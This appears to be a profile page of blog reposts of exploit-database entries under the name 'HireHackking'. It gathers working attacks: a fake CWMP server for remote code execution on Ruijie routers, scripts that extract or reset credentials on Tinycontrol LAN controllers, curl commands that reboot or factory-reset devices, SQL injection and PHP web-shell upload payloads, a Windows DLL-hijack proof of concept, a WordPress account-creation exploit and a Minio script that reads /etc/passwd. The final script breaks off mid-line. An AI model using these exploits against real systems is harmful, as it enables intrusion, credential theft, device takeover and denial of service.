Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Ruijie Reyee Mesh Router - MITM Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Ruijie Reyee Wireless Router firmware version B11P204 - MITM Remote Code Execution (RCE) # Date: April 15, 2023 # Exploit Author: Mochammad Riyan Firmansyah of SecLab Indonesia # Vendor Homepage: https://ruijienetworks.com # Software Link: https://www.ruijienetworks.com/support/documents/slide_EW1200G-PRO-Firmware-B11P204 # Version: ReyeeOS 1.204.1614; EW_3.0(1)B11P204, Release(10161400) # Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO """ Summary ======= The Ruijie Reyee Cloud Web Controller allows the user to use a diagnostic tool which includes a ping check to ensure connection to the intended network, but the ip address input form is not validated properly and allows the user to perform OS command injection. In other side, Ruijie Reyee Cloud based Device will make polling request to Ruijie Reyee CWMP server to ask if there's any command from web controller need to be executed. After analyze the network capture that come from the device, the connection for pooling request to Ruijie Reyee CWMP server is unencrypted HTTP request. Because of unencrypted HTTP request that come from Ruijie Reyee Cloud based Device, attacker could make fake server using Man-in-The-Middle (MiTM) attack and send arbitrary commands to execute on the cloud based device that make CWMP request to fake server. Once the attacker have gained access, they can execute arbitrary commands on the system or application, potentially compromising sensitive data, installing malware, or taking control of the system. This advisory has also been published at https://github.com/ruzfi/advisory/tree/main/ruijie-wireless-router-mitm-rce. """ #!/usr/bin/env python3 # -*- coding: utf-8 -*- from html import escape, unescape import http.server import socketserver import io import time import re import argparse import gzip # command payload command = "uname -a" # change this to serve on a different port PORT = 8080 def cwmp_inform(soap): cwmp_id = re.search(r"(?:<cwmp:ID.*?>)(.*?)(?:<\/cwmp:ID>)", soap).group(1) product_class = re.search(r"(?:<ProductClass.*?>)(.*?)(?:<\/ProductClass>)", soap).group(1) serial_number = re.search(r"(?:<SerialNumber.*?>)(.*?)(?:<\/SerialNumber>)", soap).group(1) result = {'cwmp_id': cwmp_id, 'product_class': product_class, 'serial_number': serial_number, 'parameters': {}} parameters = re.findall(r"(?:<P>)(.*?)(?:<\/P>)", soap) for parameter in parameters: parameter_name = re.search(r"(?:<N>)(.*?)(?:<\/N>)", parameter).group(1) parameter_value = re.search(r"(?:<V>)(.*?)(?:<\/V>)", parameter).group(1) result['parameters'][parameter_name] = parameter_value return result def cwmp_inform_response(): return """<?xml version='1.0' encoding='UTF-8'?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Header><cwmp:ID SOAP-ENV:mustUnderstand="1">16</cwmp:ID><cwmp:NoMoreRequests>1</cwmp:NoMoreRequests></SOAP-ENV:Header><SOAP-ENV:Body><cwmp:InformResponse><MaxEnvelopes>1</MaxEnvelopes></cwmp:InformResponse></SOAP-ENV:Body></SOAP-ENV:Envelope>""" def command_payload(command): current_time = time.time() result = """<?xml version='1.0' encoding='UTF-8'?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Header><cwmp:ID SOAP-ENV:mustUnderstand="1">ID:intrnl.unset.id.X_RUIJIE_COM_CN_ExecuteCliCommand{cur_time}</cwmp:ID><cwmp:NoMoreRequests>1</cwmp:NoMoreRequests></SOAP-ENV:Header><SOAP-ENV:Body><cwmp:X_RUIJIE_COM_CN_ExecuteCliCommand><Mode>config</Mode><CommandList SOAP-ENC:arrayType="xsd:string[1]"><Command>{command}</Command></CommandList></cwmp:X_RUIJIE_COM_CN_ExecuteCliCommand></SOAP-ENV:Body></SOAP-ENV:Envelope>""".format(cur_time=current_time, command=command) return result def command_response(soap): cwmp_id = re.search(r"(?:<cwmp:ID.*?>)(.*?)(?:<\/cwmp:ID>)", soap).group(1) command = re.search(r"(?:<Command>)(.*?)(?:<\/Command>)", soap).group(1) response = re.search(r"(?:<Response>)((\n|.)*?)(?:<\/Response>)", soap).group(1) result = {'cwmp_id': cwmp_id, 'command': command, 'response': response} return result class CustomHTTPRequestHandler(http.server.SimpleHTTPRequestHandler): protocol_version = 'HTTP/1.1' def do_GET(self): self.send_response(204) self.end_headers() def do_POST(self): print("[*] Got hit by", self.client_address) f = io.BytesIO() if 'service' in self.path: stage, info = self.parse_stage() if stage == "cwmp_inform": self.send_response(200) print("[!] Got Device information", self.client_address) print("[*] Product Class:", info['product_class']) print("[*] Serial Number:", info['serial_number']) print("[*] MAC Address:", info['parameters']['mac']) print("[*] STUN Client IP:", info['parameters']['stunclientip']) payload = bytes(cwmp_inform_response(), 'utf-8') f.write(payload) self.send_header("Content-Length", str(f.tell())) elif stage == "command_request": self.send_response(200) self.send_header("Set-Cookie", "JSESSIONID=6563DF85A6C6828915385C5CDCF4B5F5; Path=/service; HttpOnly") print("[*] Device interacting", self.client_address) print(info) payload = bytes(command_payload(escape("ping -c 4 127.0.0.1 && {}".format(command))), 'utf-8') f.write(payload) self.send_header("Content-Length", str(f.tell())) else: print("[*] Command response", self.client_address) print(unescape(info['response'])) self.send_response(204) f.write(b"") else: print("[x] Received invalid request", self.client_address) self.send_response(204) f.write(b"") f.seek(0) self.send_header("Connection", "keep-alive") self.send_header("Content-type", "text/xml;charset=utf-8") self.end_headers() if f: self.copyfile(f, self.wfile) f.close() def parse_stage(self): content_length = int(self.headers['Content-Length']) post_data = gzip.decompress(self.rfile.read(content_length)) if "cwmp:Inform" in post_data.decode("utf-8"): return ("cwmp_inform", cwmp_inform(post_data.decode("utf-8"))) elif "cwmp:X_RUIJIE_COM_CN_ExecuteCliCommandResponse" in post_data.decode("utf-8"): return ("command_response", command_response(post_data.decode("utf-8"))) else: return ("command_request", "Ping!") def log_message(self, format, *args): return if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--bind', '-b', default='', metavar='ADDRESS', help='Specify alternate bind address ' '[default: all interfaces]') parser.add_argument('port', action='store', default=PORT, type=int, nargs='?', help='Specify alternate port [default: {}]'.format(PORT)) args = parser.parse_args() Handler = CustomHTTPRequestHandler with socketserver.TCPServer((args.bind, args.port), Handler) as httpd: ip_addr = args.bind if args.bind != '' else '0.0.0.0' print("[!] serving fake CWMP server at {}:{}".format(ip_addr, args.port)) try: httpd.serve_forever() except KeyboardInterrupt: pass httpd.server_close() """ Output ====== ubuntu:~$ python3 exploit.py [!] serving fake CWMP server at 0.0.0.0:8080 [*] Got hit by ('[redacted]', [redacted]) [!] Got Device information ('[redacted]', [redacted]) [*] Product Class: EW1200G-PRO [*] Serial Number: [redacted] [*] MAC Address: [redacted] [*] STUN Client IP: [redacted]:[redacted] [*] Got hit by ('[redacted]', [redacted]) [*] Device interacting ('[redacted]', [redacted]) Ping! [*] Got hit by ('[redacted]', [redacted]) [*] Command response ('[redacted]', [redacted]) PING 127.0.0.1 (127.0.0.1): 56 data bytes 64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.400 ms 64 bytes from 127.0.0.1: seq=1 ttl=64 time=0.320 ms 64 bytes from 127.0.0.1: seq=2 ttl=64 time=0.320 ms 64 bytes from 127.0.0.1: seq=3 ttl=64 time=0.300 ms --- 127.0.0.1 ping statistics --- 4 packets transmitted, 4 packets received, 0% packet loss round-trip min/avg/max = 0.300/0.335/0.400 ms Linux Ruijie 3.10.108 #1 SMP Fri Apr 14 00:39:29 UTC 2023 mips GNU/Linux """
  2. HireHackking

    Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Credentials Extraction

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/env python # #Exploit Title: Tinycontrol LAN Controller v3 (LK3) - Remote Credentials Extraction # Exploit Author: LiquidWorm # # Vendor: Tinycontrol # Product web page: https://www.tinycontrol.pl # Affected version: <=1.58a, HW 3.8 # # Summary: Lan Controller is a very universal # device that allows you to connect many different # sensors and remotely view their readings and # remotely control various types of outputs. # It is also possible to combine both functions # into an automatic if -> this with a calendar # when -> then. The device provides a user interface # in the form of a web page. The website presents # readings of various types of sensors: temperature, # humidity, pressure, voltage, current. It also # allows you to configure the device, incl. event # setting and controlling up to 10 outputs. Thanks # to the support of many protocols, it is possible # to operate from smartphones, collect and observ # the results on the server, as well as cooperation # with other I/O systems based on TCP/IP and Modbus. # # Desc: An unauthenticated attacker can retrieve the # controller's configuration backup file and extract # sensitive information that can allow him/her/them # to bypass security controls and penetrate the system # in its entirety. # # Tested on: lwIP # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2023-5786 # Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5786.php # # # 18.08.2023 # # import subprocess import requests import base64 import sys binb = "lk3_settings.bin" outf = "lk3_settings.enc" bpatt = "0upassword" epatt = "pool.ntp.org" startf = False endf = False extral = [] print(""" O`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'O | | | Tinycontrol LK3 1.58 Settings DL | | ZSL-2023-5786 | | 2023 (c) Zero Science Lab | | | |`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'| | | """) if len(sys.argv) != 2: print("[?] Vaka: python {} ipaddr:port".format(sys.argv[0])) exit(-0) else: rhost=sys.argv[1] if not "http" in rhost: rhost="http://{}".format(rhost) try: resp = requests.get(rhost + "/" + binb) if resp.status_code == 200: with open(outf, 'wb') as f: f.write(resp.content) print(f"[*] Got data as {outf}") else: print(f"[!] Backup failed. Status code: {resp.status_code}") except Exception as e: print("[!] Error:", str(e)) exit(-1) binf = outf sout = subprocess.check_output(["strings", binf], universal_newlines = True) linea = sout.split("\n") for thricer in linea: if bpatt in thricer: startf = True elif epatt in thricer: endf = True elif startf and not endf: extral.append(thricer) if len(extral) >= 4: userl = extral[1].strip() adminl = extral[3].strip() try: decuser = base64.b64decode(userl).decode("utf-8") decadmin = base64.b64decode(adminl).decode("utf-8") print("[+] User password:", decuser) print("[+] Admin password:", decadmin) except Exception as e: print("[!] Error decoding:", str(e)) else: print("[!] Regex failed.") exit(-2)
  3. HireHackking

    Clcknshop 1.0.0 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Clcknshop 1.0.0 - SQL Injection # Exploit Author: CraCkEr # Date: 16/08/2023 # Vendor: Infosoftbd Solutions # Vendor Homepage: https://infosoftbd.com/ # Software Link: https://infosoftbd.com/multitenancy-e-commerce-solution/ # Demo: https://kidszone.clckn.shop/ # Version: 1.0.0 # Tested on: Windows 10 Pro # Impact: Database Access # CVE: CVE-2023-4708 # CWE: CWE-89 - CWE-74 - CWE-707 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /collection/all GET parameter 'tag' is vulnerable to SQL Injection https://website/collection/all?tag=[SQLi] --- Parameter: tag (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: tag=tshirt'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z ---
  4. HireHackking

    Online ID Generator 1.0 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    ## Title: Online ID Generator 1.0 - Remote Code Execution (RCE) ## Author: nu11secur1ty ## Date: 08/31/2023 ## Vendor: https://www.youtube.com/watch?v=JdB9_po5DTc ## Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/id_generator_0.zip ## Reference: https://portswigger.net/web-security/sql-injection ## Reference: https://portswigger.net/web-security/file-upload ## Reference: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload STATUS: HIGH-CRITICAL Vulnerability [+]Bypass login SQLi: # In login form, for user: ```mysql nu11secur1ty' or 1=1# ``` [+]Shell Upload exploit: ## For system logo: ```php <?php phpinfo(); ?> ``` [+]RCE Exploit ## Execution from the remote browser: ```URLhttp://localhost/id_generator/uploads/1693471560_info.php ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-ID-Generator-1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/08/online-id-generator-10-sqli-bypass.html) ## Time spend: 00:10:00
  5. HireHackking

    Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Denial Of Service

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Denial Of Service Exploit Author: LiquidWorm Vendor: Tinycontrol Product web page: https://www.tinycontrol.pl Affected version: <=1.58a, HW 3.8 Summary: Lan Controller is a very universal device that allows you to connect many different sensors and remotely view their readings and remotely control various types of outputs. It is also possible to combine both functions into an automatic if -> this with a calendar when -> then. The device provides a user interface in the form of a web page. The website presents readings of various types of sensors: temperature, humidity, pressure, voltage, current. It also allows you to configure the device, incl. event setting and controlling up to 10 outputs. Thanks to the support of many protocols, it is possible to operate from smartphones, collect and observ the results on the server, as well as cooperation with other I/O systems based on TCP/IP and Modbus. Desc: The controller suffers from an unauthenticated remote denial of service vulnerability. An attacker can issue direct requests to the stm.cgi page to reboot and also reset factory settings on the device. Tested on: lwIP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5785 Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5785.php 18.08.2023 -- $ curl http://192.168.1.1:8082/stm.cgi?eeprom_reset=1 # restore default settings $ curl http://192.168.1.1:8082/stm.cgi?lk3restart=1 # reboot controller
  6. HireHackking

    Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change

    HireHackking posted a blog entry in Hacker Technology
    #!/bin/bash : " Exploit Title: Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change Exploit Author: LiquidWorm Vendor: Tinycontrol Product web page: https://www.tinycontrol.pl Affected version: <=1.58a, HW 3.8 Summary: Lan Controller is a very universal device that allows you to connect many different sensors and remotely view their readings and remotely control various types of outputs. It is also possible to combine both functions into an automatic if -> this with a calendar when -> then. The device provides a user interface in the form of a web page. The website presents readings of various types of sensors: temperature, humidity, pressure, voltage, current. It also allows you to configure the device, incl. event setting and controlling up to 10 outputs. Thanks to the support of many protocols, it is possible to operate from smartphones, collect and observ the results on the server, as well as cooperation with other I/O systems based on TCP/IP and Modbus. Desc: The application suffers from an insecure access control allowing an unauthenticated attacker to change accounts passwords and bypass authentication gaining panel control access. Tested on: lwIP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5787 Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5787.php 18.08.2023 " set -euo pipefail IFS=$'\n\t' if [ $# -ne 2 ]; then echo -ne '\nUsage: $0 [ipaddr] [desired admin pwd]\n\n' exit fi IP=$1 PW=$2 EN=$(echo -n $PW | base64) curl -s http://$IP/stm.cgi?auth=00YWRtaW4=*$EN*dXNlcg==*dXNlcg== # ?auth=00 (disable authentication, disable upgrade), https://docs.tinycontrol.pl/en/lk3/api/access/ echo -ne '\nAdmin password changed to: '$PW
  7. HireHackking

    Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced)

    HireHackking posted a blog entry in Hacker Technology
    #--------------------------------------------------------- # Title: Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced) # Date: 2023-09-01 # Author: Moein Shahabi # Vendor: https://www.microsoft.com # Version: Windows 11 Pro 10.0.22621 # Tested on: Windows 11_x64 [eng] #--------------------------------------------------------- Description: HelpPane object allows us to force Windows 11 to DLL hijacking Instructions: 1. Compile dll 2. Copy newly compiled dll "apds.dll" in the "C:\Windows\" directory 3. Launch cmd and Execute the following command to test HelpPane object "[System.Activator]::CreateInstance([Type]::GetTypeFromCLSID('8CEC58AE-07A1-11D9-B15E-000D56BFE6EE'))" 4. Boom DLL Hijacked! ------Code_Poc------- #pragma once #include <Windows.h> // Function executed when the thread starts extern "C" __declspec(dllexport) DWORD WINAPI MessageBoxThread(LPVOID lpParam) { MessageBox(NULL, L"DLL Hijacked!", L"DLL Hijacked!", NULL); return 0; } PBYTE AllocateUsableMemory(PBYTE baseAddress, DWORD size, DWORD protection = PAGE_READWRITE) { #ifdef _WIN64 PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)baseAddress; PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((PBYTE)dosHeader + dosHeader->e_lfanew); PIMAGE_OPTIONAL_HEADER optionalHeader = &ntHeaders->OptionalHeader; // Create some breathing room baseAddress = baseAddress + optionalHeader->SizeOfImage; for (PBYTE offset = baseAddress; offset < baseAddress + MAXDWORD; offset += 1024 * 8) { PBYTE usuable = (PBYTE)VirtualAlloc( offset, size, MEM_RESERVE | MEM_COMMIT, protection); if (usuable) { ZeroMemory(usuable, size); // Not sure if this is required return usuable; } } #else // x86 doesn't matter where we allocate PBYTE usuable = (PBYTE)VirtualAlloc( NULL, size, MEM_RESERVE | MEM_COMMIT, protection); if (usuable) { ZeroMemory(usuable, size); return usuable; } #endif return 0; } BOOL ProxyExports(HMODULE ourBase, HMODULE targetBase) { #ifdef _WIN64 BYTE jmpPrefix[] = { 0x48, 0xb8 }; // Mov Rax <Addr> BYTE jmpSuffix[] = { 0xff, 0xe0 }; // Jmp Rax #else BYTE jmpPrefix[] = { 0xb8 }; // Mov Eax <Addr> BYTE jmpSuffix[] = { 0xff, 0xe0 }; // Jmp Eax #endif PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)targetBase; PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((PBYTE)dosHeader + dosHeader->e_lfanew); PIMAGE_OPTIONAL_HEADER optionalHeader = &ntHeaders->OptionalHeader; PIMAGE_DATA_DIRECTORY exportDataDirectory = &optionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; if (exportDataDirectory->Size == 0) return FALSE; // Nothing to forward PIMAGE_EXPORT_DIRECTORY targetExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)dosHeader + exportDataDirectory->VirtualAddress); if (targetExportDirectory->NumberOfFunctions != targetExportDirectory->NumberOfNames) return FALSE; // TODO: Add support for DLLs with mixed ordinals dosHeader = (PIMAGE_DOS_HEADER)ourBase; ntHeaders = (PIMAGE_NT_HEADERS)((PBYTE)dosHeader + dosHeader->e_lfanew); optionalHeader = &ntHeaders->OptionalHeader; exportDataDirectory = &optionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; if (exportDataDirectory->Size == 0) return FALSE; // Our DLL is broken PIMAGE_EXPORT_DIRECTORY ourExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)dosHeader + exportDataDirectory->VirtualAddress); // ---------------------------------- // Make current header data RW for redirections DWORD oldProtect = 0; if (!VirtualProtect( ourExportDirectory, 64, PAGE_READWRITE, &oldProtect)) { return FALSE; } DWORD totalAllocationSize = 0; // Add the size of jumps totalAllocationSize += targetExportDirectory->NumberOfFunctions * (sizeof(jmpPrefix) + sizeof(jmpSuffix) + sizeof(LPVOID)); // Add the size of function table totalAllocationSize += targetExportDirectory->NumberOfFunctions * sizeof(INT); // Add total size of names PINT targetAddressOfNames = (PINT)((PBYTE)targetBase + targetExportDirectory->AddressOfNames); for (DWORD i = 0; i < targetExportDirectory->NumberOfNames; i++) totalAllocationSize += (DWORD)strlen(((LPCSTR)((PBYTE)targetBase + targetAddressOfNames[i]))) + 1; // Add size of name table totalAllocationSize += targetExportDirectory->NumberOfNames * sizeof(INT); // Add the size of ordinals: totalAllocationSize += targetExportDirectory->NumberOfFunctions * sizeof(USHORT); // Allocate usuable memory for rebuilt export data PBYTE exportData = AllocateUsableMemory((PBYTE)ourBase, totalAllocationSize, PAGE_READWRITE); if (!exportData) return FALSE; PBYTE sideAllocation = exportData; // Used for VirtualProtect later // Copy Function Table PINT newFunctionTable = (PINT)exportData; CopyMemory(newFunctionTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNames, targetExportDirectory->NumberOfFunctions * sizeof(INT)); exportData += targetExportDirectory->NumberOfFunctions * sizeof(INT); ourExportDirectory->AddressOfFunctions = (DWORD)((PBYTE)newFunctionTable - (PBYTE)ourBase); // Write JMPs and update RVAs in the new function table PINT targetAddressOfFunctions = (PINT)((PBYTE)targetBase + targetExportDirectory->AddressOfFunctions); for (DWORD i = 0; i < targetExportDirectory->NumberOfFunctions; i++) { newFunctionTable[i] = (DWORD)(exportData - (PBYTE)ourBase); CopyMemory(exportData, jmpPrefix, sizeof(jmpPrefix)); exportData += sizeof(jmpPrefix); PBYTE realAddress = (PBYTE)((PBYTE)targetBase + targetAddressOfFunctions[i]); CopyMemory(exportData, &realAddress, sizeof(LPVOID)); exportData += sizeof(LPVOID); CopyMemory(exportData, jmpSuffix, sizeof(jmpSuffix)); exportData += sizeof(jmpSuffix); } // Copy Name RVA Table PINT newNameTable = (PINT)exportData; CopyMemory(newNameTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNames, targetExportDirectory->NumberOfNames * sizeof(DWORD)); exportData += targetExportDirectory->NumberOfNames * sizeof(DWORD); ourExportDirectory->AddressOfNames = (DWORD)((PBYTE)newNameTable - (PBYTE)ourBase); // Copy names and apply delta to all the RVAs in the new name table for (DWORD i = 0; i < targetExportDirectory->NumberOfNames; i++) { PBYTE realAddress = (PBYTE)((PBYTE)targetBase + targetAddressOfNames[i]); DWORD length = (DWORD)strlen((LPCSTR)realAddress); CopyMemory(exportData, realAddress, length); newNameTable[i] = (DWORD)((PBYTE)exportData - (PBYTE)ourBase); exportData += length + 1; } // Copy Ordinal Table PINT newOrdinalTable = (PINT)exportData; CopyMemory(newOrdinalTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNameOrdinals, targetExportDirectory->NumberOfFunctions * sizeof(USHORT)); exportData += targetExportDirectory->NumberOfFunctions * sizeof(USHORT); ourExportDirectory->AddressOfNameOrdinals = (DWORD)((PBYTE)newOrdinalTable - (PBYTE)ourBase); // Set our counts straight ourExportDirectory->NumberOfFunctions = targetExportDirectory->NumberOfFunctions; ourExportDirectory->NumberOfNames = targetExportDirectory->NumberOfNames; if (!VirtualProtect( ourExportDirectory, 64, oldProtect, &oldProtect)) { return FALSE; } if (!VirtualProtect( sideAllocation, totalAllocationSize, PAGE_EXECUTE_READ, &oldProtect)) { return FALSE; } return TRUE; } // Executed when the DLL is loaded (traditionally or through reflective injection) BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { HMODULE realDLL; switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: CreateThread(NULL, NULL, MessageBoxThread, NULL, NULL, NULL); realDLL = LoadLibrary(L"C:\\Windows\\System32\\apds.dll"); if (realDLL) ProxyExports(hModule, realDLL); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } --------------------------
  8. HireHackking

    Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation # Google Dork: inurl:/user-public-account # Date: 2023-09-04 # Exploit Author: Revan Arifio # Vendor Homepage: https:/.org/plugins/masterstudy-lms-learning-management-system/ # Version: <= 3.0.17 # Tested on: Windows, Linux # CVE : CVE-2023-4278 import requests import os import re import time banner = """ _______ ________ ___ ___ ___ ____ _ _ ___ ______ ___ / ____\ \ / / ____| |__ \ / _ \__ \|___ \ | || |__ \____ / _ \ | | \ \ / /| |__ ______ ) | | | | ) | __) |_____| || |_ ) | / / (_) | | | \ \/ / | __|______/ /| | | |/ / |__ <______|__ _/ / / / > _ < | |____ \ / | |____ / /_| |_| / /_ ___) | | |/ /_ / / | (_) | \_____| \/ |______| |____|\___/____|____/ |_|____/_/ \___/ ====================================================================================================== || Title : Masterstudy LMS <= 3.0.17 - Unauthenticated Instructor Account Creation || || Author : https://github.com/revan-ar || || Vendor Homepage : https:/wordpress.org/plugins/masterstudy-lms-learning-management-system/ || || Support : https://www.buymeacoffee.com/revan.ar || ====================================================================================================== """ print(banner) # get nonce def get_nonce(target): open_target = requests.get("{}/user-public-account".format(target)) search_nonce = re.search('"stm_lms_register":"(.*?)"', open_target.text) if search_nonce[1] != None: return search_nonce[1] else: print("Failed when getting Nonce :p") # privielege escalation def privesc(target, nonce, username, password, email): req_data = { "user_login":"{}".format(username), "user_email":"{}".format(email), "user_password":"{}".format(password), "user_password_re":"{}".format(password), "become_instructor":True, "privacy_policy":True, "degree":"", "expertize":"", "auditory":"", "additional":[], "additional_instructors":[], "profile_default_fields_for_register":[], "redirect_page":"{}/user-account/".format(target) } start = requests.post("{}/wp-admin/admin-ajax.php?action=stm_lms_register&nonce={}".format(target, nonce), json = req_data) if start.status_code == 200: print("[+] Exploit Success !!") else: print("[+] Exploit Failed :p") # URL target target = input("[+] URL Target: ") print("[+] Starting Exploit") plugin_check = requests.get("{}/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt".format(target)) plugin_version = re.search("Stable tag: (.+)", plugin_check.text) int_version = plugin_version[1].replace(".", "") time.sleep(1) if int(int_version) < 3018: print("[+] Target is Vulnerable !!") # Credential email = input("[+] Email: ") username = input("[+] Username: ") password = input("[+] Password: ") time.sleep(1) print("[+] Getting Nonce...") get_nonce = get_nonce(target) # Get Nonce if get_nonce != None: print("[+] Success Getting Nonce: {}".format(get_nonce)) time.sleep(1) # Start PrivEsc privesc(target, get_nonce, username, password, email) # ---------------------------------- else: print("[+] Target is NOT Vulnerable :p")
  9. HireHackking

    WEBIGniter v28.7.23 File Upload - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    ## Title: WEBIGniter v28.7.23 File Upload - Remote Code Execution ## Author: nu11secur1ty ## Date: 09/04/2023 ## Vendor: https://webigniter.net/ ## Software: https://webigniter.net/demo ## Reference: https://portswigger.net/web-security/file-upload ## Description: The media function suffers from file upload vulnerability. The attacker can upload and he can execute remotely very dangerous PHP files, by using any created account before this on this system. Then he can do very malicious stuff with the server of this application. ## Staus: HIGH-CRITICAL Vulnerability [+]Simple Exploit: ```PHP <?php phpinfo(); ?> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WEBIGniter/2023/WEBIGniter-28.7.23-File-Upload-RCE) ## Proof and Exploit [href](https://www.nu11secur1ty.com/2023/09/webigniter-28723-file-upload-rce.html) ## Time spent: 00:15:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
  10. HireHackking

    Minio 2022-07-29T19-40-48Z - Path traversal

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Minio 2022-07-29T19-40-48Z - Path traversal # Date: 2023-09-02 # Exploit Author: Jenson Zhao # Vendor Homepage: https://min.io/ # Software Link: https://github.com/minio/minio/ # Version: Up to (excluding) 2022-07-29T19-40-48Z # Tested on: Windows 10 # CVE : CVE-2022-35919 # Required before execution: pip install minio,requests import urllib.parse import requests, json, re, datetime, argparse from minio.credentials import Credentials from minio.signer import sign_v4_s3 class MyMinio(): secure = False def __init__(self, base_url, access_key, secret_key): self.credits = Credentials( access_key=access_key, secret_key=secret_key ) if base_url.startswith('http://') and base_url.endswith('/'): self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd' elif base_url.startswith('https://') and base_url.endswith('/'): self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd' self.secure = True else: print('Please enter a URL address that starts with "http://" or "https://" and ends with "/"\n') def poc(self): datetimes = datetime.datetime.utcnow() datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ') urls = urllib.parse.urlparse(self.url) headers = { 'X-Amz-Content-Sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', 'X-Amz-Date': datetime_str, 'Host': urls.netloc, } headers = sign_v4_s3( method='POST', url=urls, region='', headers=headers, credentials=self.credits, content_sha256='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', date=datetimes, ) if self.secure: response = requests.post(url=self.url, headers=headers, verify=False) else: response = requests.post(url=self.url, headers=headers) try: message = json.loads(response.text)['Message'] pattern = r'(\w+):(\w+):(\d+):(\d+):(\w+):(\/[\w\/\.-]+):(\/[\w\/\.-]+)' matches = re.findall(pattern, message) if matches: print('There is CVE-2022-35919 problem with the url!') print('The contents of the /etc/passwd file are as follows:') for match in matches: print("{}:{}:{}:{}:{}:{}:{}".format(match[0], match[1], match[2], match[3], match[4], match[5], match[6])) else: print('There is no CVE-2022-35919 problem with the url!') print('Here is the response message content:') print(message) except Exception as e: print( 'It seems there was an issue with the requested response, which did not meet our expected criteria. 